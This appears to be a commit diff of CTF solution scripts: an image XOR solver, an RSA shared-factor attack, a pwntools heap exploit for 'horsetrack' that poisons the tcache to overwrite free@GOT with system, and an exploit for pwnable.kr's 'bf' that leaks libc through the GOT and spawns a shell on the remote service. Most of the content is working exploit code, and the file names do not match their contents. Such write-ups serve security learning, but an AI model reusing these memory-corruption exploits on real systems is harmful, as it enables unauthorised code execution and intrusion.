pico sols + pwnable.kr bf

Author: programmeruser2

picoCTF/2019/ld-2.29.so

@@ -0,0 +1,16 @@
+from PIL import Image 
+img1 = Image.open('scrambled1.png')
+img2 = Image.open('scrambled2.png')
+res = Image.new('RGBA', (img1.size[0], img1.size[1]))
+px1 = img1.load()
+px2 = img2.load()
+respx = res.load()
+for i in range(res.size[0]):
+	for j in range(res.size[1]):
+		px = tuple(map(lambda a: a[0]^a[1], zip(px1[i,j], px2[i,j])))
+		if px != (255, 255, 255):
+			respx[i,j] = (0,0,0)
+		else:
+			respx[i,j] = (255, 255, 255)
+res.save('result.png')
+

picoCTF/2019/libc.so.6

@@ -0,0 +1,55 @@
+from pwn import *
+#context.log_level = 'debug'
+e = ELF('./horsetrack')
+r = process('./horsetrack')
+#r = gdb.debug('./horsetrack', 'b *0x004014fb\nc')
+
+def add_horse(i, length, data):
+    r.recvuntil(b'Choice: ')
+    r.sendline(b'1')
+    r.sendline(str(i).encode())
+    r.sendline(str(length).encode())
+    r.sendline(data)
+def remove_horse(i):
+    r.recvuntil(b'Choice: ')
+    r.sendline(b'2')
+    r.sendline(str(i).encode())
+def race():
+    r.recvuntil(b'Choice: ')
+    r.sendline(b'3')
+def do_exit():
+    r.recvuntil(b'Choice: ')
+    r.sendline(b'4')
+def cheat(i, spot, data):
+    r.recvuntil(b'Choice: ')
+    r.sendline(b'0')
+    r.sendline(str(i).encode())
+    r.sendline(data)
+    r.sendline(str(spot).encode())
+add_horse(0, 16, b'a'*16)
+remove_horse(0)
+add_horse(0, 16, b'\xff')
+for _ in range(4):
+    add_horse(_ + 1, 16, b'a'*16)
+print('racing')
+race()
+
+c = b'\x20'
+while c[0] == 0x20:
+    c = r.recv(1)
+key = u16(c+r.recv(1))
+print('aslr bits:', hex(key))
+add_horse(5, 16, b'1'*16)
+add_horse(6, 16, b'2'*16)
+add_horse(7, 16, b'/bin/sh\x00' + b'\xff')
+remove_horse(5)
+remove_horse(6)
+target = e.got['free']-8
+print('target', hex(target))
+assert target & 0xf == 0
+cheat(6, 0, p64(target^key) + b'\xff')
+add_horse(8, 16, b'a'*16)
+add_horse(9, 16, b'a'*8 + p64(e.plt['system']))
+remove_horse(7)
+
+r.interactive()

picoCTF/2019/zero_to_hero

@@ -0,0 +1,20 @@
+from math import gcd
+from Crypto.Util.number import long_to_bytes
+n1 = 15192492059814175574941055248891268822162533520576381643453916855435310880285336743521199057138647926712835561752909538944229702432795423884081992987060760867003375755338557996965825324749221386675061886921763747311599846248565297387814717840084998677273427776535730840343260681623323972936404815862969684384733188827100528542007213405382537935243645704237369770300643318878176739181891072725262069278646319502747718264711249767568106460533935904219027313131270918072460753061248221785076571054217566164086518459844527639082962818865640864990672033657423448004651989761933295878220596871163544315057550871764431562609
+n2 = 15896482259608901559307142941940447232781986632502572991096358742354276347180855512281737388865155342941898447990281534875563129451327818848218781669275420292448483501384399236235069545630630803245125324540747189305877026874280373084005881976783826855683894679886076284892158862128016644725623200756074647449586448311069649515124968073653962156220351541159266665209363921681260367806445996085898841723209546021525012849575330252109081102034217511126192041193752164593519033112893785698509908066978411804133407757110693612926897693360335062446358344787945536573595254027237186626524339635916646549827668224103778645691
+n3 = 16866741024290909515057727275216398505732182398866918550484373905882517578053919415558082579015872872951000794941027637288054371559194213756955947899010737036612882434425333227722062177363502202508368233645194979635011153509966453453939567651558628538264913958577698775210185802686516291658717434986786180150155217870273053289491069438118831268852205061142773994943387097417127660301519478434586738321776681183207796708047183864564628638795241493797850819727510884955449295504241048877759144706319821139891894102191791380663609673212846473456961724455481378829090944739778647230176360232323776623751623188480059886131
+e = 65537
+c = 5527557130549486626868355638343164556636640645975070563878791684872084568660950949839392805902757480207470630636669246237037694811318758082850684387745430679902248681495009593699928689084754915870981630249821819243308794164014262751330197659053593094226287631278905866187610594268602850237495796773397013150811502709453828013939726304717253858072813654392558403246468440154864433527550991691477685788311857169847773031859714215539719699781912119479668386111728900692806809163838659848295346731226661208367992168348253106720454566346143578242135426677554444162371330348888185625323879290902076363791018691228620744490
+p = gcd(n1, n2)
+q = gcd(n1, n3)
+r = gcd(n2, n3)
+def dec(ct, a, b):
+    n = a*b
+    d = pow(e, -1, (a-1)*(b-1))%n
+    return pow(ct, d, n)
+d = dec(c, q, r)
+d = dec(d, p, r)
+d = dec(d, p, q)
+print(long_to_bytes(d).decode())
+
+

picoCTF/2021/pixelated.py

@@ -0,0 +1,30 @@
+# leak libc base
+# write one-gadget to puts got 
+'''
+0x5fbd5 execl("/bin/sh", eax)
+constraints:
+  esi is the GOT address of libc
+  eax == NULL
+'''
+# jump back to __libc_start_main with another got overwrite 
+from pwn import *
+context.log_level = 'debug'
+e = ELF('./bf')
+libc = ELF('./bf_libc.so')
+#r = process('./bf_patched')
+r = remote('pwnable.kr', 9001)
+#r = gdb.debug('./bf_patched', 'b main\nc')
+r.recvuntil(b']\n')
+r.sendline(b'.'+b'<'*(e.sym['tape']-e.got['putchar'])+b'.>'*4+b'<'*4+b',>'*4+b'<'*(e.got['putchar']+4-e.got['puts'])+b',>'*4+b'.')
+# make sure putchar is resolved first 
+r.recv(1)
+leak = u32(r.recv(4))
+print('putchar@got =', hex(leak))
+libc.address = leak - libc.sym['putchar']
+print('libc.address =', hex(libc.address))
+# putchar -> __libc_start_main(main), puts -> one-gadget
+r.send(p32(e.sym['_start']))
+r.send(p32(libc.address + 0x5fbd5))
+r.interactive()
+
+

picoCTF/2021/result.png

@@ -0,0 +1 @@
+bf_libc.so